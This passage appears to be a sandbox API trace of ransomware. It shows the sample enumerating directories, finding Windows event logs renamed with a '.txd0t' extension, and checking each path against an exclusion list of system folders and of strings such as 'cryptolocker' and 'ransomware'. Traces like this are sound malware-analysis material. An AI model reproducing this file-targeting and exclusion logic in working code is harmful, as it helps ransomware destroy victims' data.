FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd122d184, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd122d184, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a871d72, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Winlogon%4Operational.evtx.txd0t", cAlternateFileName="MIBAE9~1.TXD")) returned 1 [0128.942] StrCmpW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.942] StrCmpW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.942] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.942] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.942] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Winlogon%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.txd0t" [0128.942] PathFindExtensionW (pszPath="Microsoft-Windows-Winlogon%4Operational.evtx.txd0t") returned=".txd0t" [0128.942] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.942] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf164b9b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcf164b9b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5acc9565, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x101200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-WMI-Activity%4Operational.evtx.txd0t", cAlternateFileName="MI1EF7~1.TXD")) returned 1 [0128.942] StrCmpW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.942] StrCmpW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.942] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.942] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.942] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-WMI-Activity%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.txd0t" [0128.942] PathFindExtensionW (pszPath="Microsoft-Windows-WMI-Activity%4Operational.evtx.txd0t") returned=".txd0t" [0128.943] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.943] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a956f95, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x111200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Security.evtx.txd0t", cAlternateFileName="SECURI~1.TXD")) returned 1 [0128.943] StrCmpW (psz1="Security.evtx.txd0t", psz2=".") returned 1 [0128.943] StrCmpW (psz1="Security.evtx.txd0t", psz2="..") returned 1 [0128.943] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.943] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.943] StrNCatW (in: psz1="C:\\Logs\\", psz2="Security.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Security.evtx.txd0t") returned="C:\\Logs\\Security.evtx.txd0t" [0128.943] PathFindExtensionW (pszPath="Security.evtx.txd0t") returned=".txd0t" [0128.943] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.943] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a6db2c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x95a6db2c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a97ce4f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Setup.evtx.txd0t", cAlternateFileName="SETUPE~1.TXD")) returned 1 [0128.943] StrCmpW (psz1="Setup.evtx.txd0t", psz2=".") returned 1 [0128.943] StrCmpW (psz1="Setup.evtx.txd0t", psz2="..") returned 1 [0128.943] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.943] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.943] StrNCatW (in: psz1="C:\\Logs\\", psz2="Setup.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Setup.evtx.txd0t") returned="C:\\Logs\\Setup.evtx.txd0t" [0128.943] PathFindExtensionW (pszPath="Setup.evtx.txd0t") returned=".txd0t" [0128.943] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.943] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505097c4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505097c4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a9ef500, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x111200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="System.evtx.txd0t", cAlternateFileName="SYSTEM~1.TXD")) returned 1 [0128.943] StrCmpW (psz1="System.evtx.txd0t", psz2=".") returned 1 [0128.943] StrCmpW (psz1="System.evtx.txd0t", psz2="..") returned 1 [0128.943] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.943] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.943] StrNCatW (in: psz1="C:\\Logs\\", psz2="System.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\System.evtx.txd0t") returned="C:\\Logs\\System.evtx.txd0t" [0128.943] PathFindExtensionW (pszPath="System.evtx.txd0t") returned=".txd0t" [0128.943] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.943] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5aaae102, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Windows PowerShell.evtx.txd0t", cAlternateFileName="WINDOW~1.TXD")) returned 1 [0128.943] StrCmpW (psz1="Windows PowerShell.evtx.txd0t", psz2=".") returned 1 [0128.943] StrCmpW (psz1="Windows PowerShell.evtx.txd0t", psz2="..") returned 1 [0128.943] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.943] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.943] StrNCatW (in: psz1="C:\\Logs\\", psz2="Windows PowerShell.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Windows PowerShell.evtx.txd0t") returned="C:\\Logs\\Windows PowerShell.evtx.txd0t" [0128.943] PathFindExtensionW (pszPath="Windows PowerShell.evtx.txd0t") returned=".txd0t" [0128.943] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.943] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5aaae102, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Windows PowerShell.evtx.txd0t", cAlternateFileName="WINDOW~1.TXD")) returned 0 [0128.943] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.944] GetProcessHeap () returned 0xe30000 [0128.944] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0128.944] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0xaced8ceb, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0128.944] StrCmpW (psz1="pagefile.sys", psz2=".") returned 1 [0128.944] StrCmpW (psz1="pagefile.sys", psz2="..") returned 1 [0128.944] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0128.944] StrCmpW (psz1="PerfLogs", psz2=".") returned 1 [0128.944] StrCmpW (psz1="PerfLogs", psz2="..") returned 1 [0128.944] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0128.944] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0128.944] StrNCatW (in: psz1="C:\\", psz2="PerfLogs", cchMax=1030 | out: psz1="C:\\PerfLogs") returned="C:\\PerfLogs" [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\windows\\system32\\") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\windows\\system\\") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\appdata\\local\\") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\boot\\") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\perflogs\\") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\programdata\\") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\drivers\\") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\wsus\\") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="crypt_detect") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="cryptolocker") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="ransomware") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="C:\\WINDOWS") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.944] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="C:\\Program Files") returned 0x0 [0128.944] GetProcessHeap () returned 0xe30000 [0128.945] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x498) returned 0xf0daf8 [0128.945] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\PerfLogs", cchMax=1048 | out: psz1="C:\\PerfLogs") returned="C:\\PerfLogs" [0128.945] StrNCatW (in: psz1="C:\\PerfLogs", psz2="\\*", cchMax=1048 | out: psz1="C:\\PerfLogs\\*") returned="C:\\PerfLogs\\*" [0128.945] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650e21, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.945] StrCmpW (psz1=".", psz2=".") returned 0 [0128.945] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650e21, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.945] StrCmpW (psz1="..", psz2=".") returned 1 [0128.945] StrCmpW (psz1="..", psz2="..") returned 0 [0128.945] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650e21, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0128.945] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.945] GetProcessHeap () returned 0xe30000 [0128.945] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0128.945] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xf0ddeecc, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xf0ddeecc, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0128.945] StrCmpW (psz1="Program Files", psz2=".") returned 1 [0128.945] StrCmpW (psz1="Program Files", psz2="..") returned 1 [0128.945] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0128.945] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0128.945] StrNCatW (in: psz1="C:\\", psz2="Program Files", cchMax=1030 | out: psz1="C:\\Program Files") returned="C:\\Program Files" [0128.945] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\windows\\system32\\") returned 0x0 [0128.945] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.945] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\windows\\system\\") returned 0x0 [0128.945] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.945] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.945] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\appdata\\local\\") returned 0x0 [0128.945] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.945] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.945] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.945] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\boot\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\perflogs\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\programdata\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\drivers\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\wsus\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files", lpSrch="crypt_detect") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files", lpSrch="cryptolocker") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files", lpSrch="ransomware") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files", lpSrch="C:\\WINDOWS") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files", lpSrch="C:\\Program Files") returned="C:\\Program Files" [0128.946] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe7a165b3, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe7a165b3, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0128.946] StrCmpW (psz1="Program Files (x86)", psz2=".") returned 1 [0128.946] StrCmpW (psz1="Program Files (x86)", psz2="..") returned 1 [0128.946] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0128.946] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0128.946] StrNCatW (in: psz1="C:\\", psz2="Program Files (x86)", cchMax=1030 | out: psz1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0128.946] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\windows\\system32\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\windows\\system\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\appdata\\local\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\boot\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\perflogs\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\programdata\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\drivers\\") returned 0x0 [0128.946] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\wsus\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="crypt_detect") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="cryptolocker") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="ransomware") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="C:\\WINDOWS") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0128.947] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x599fba8 | out: lpFindFileData=0x599fba8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0128.947] StrCmpW (psz1="ProgramData", psz2=".") returned 1 [0128.947] StrCmpW (psz1="ProgramData", psz2="..") returned 1 [0128.947] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0128.947] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0128.947] StrNCatW (in: psz1="C:\\", psz2="ProgramData", cchMax=1030 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\windows\\system32\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\windows\\system\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\appdata\\local\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\boot\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\perflogs\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\programdata\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\drivers\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\wsus\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="crypt_detect") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="cryptolocker") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="ransomware") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="C:\\WINDOWS") returned 0x0 [0128.947] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.948] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="C:\\Program Files") returned 0x0 [0128.948] GetProcessHeap () returned 0xe30000 [0128.948] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x49e) returned 0xf0daf8 [0128.948] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0128.948] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\*", cchMax=1054 | out: psz1="C:\\ProgramData\\*") returned="C:\\ProgramData\\*" [0128.948] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*", lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440e1a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.948] StrCmpW (psz1=".", psz2=".") returned 0 [0128.948] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440e1a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.948] StrCmpW (psz1="..", psz2=".") returned 1 [0128.948] 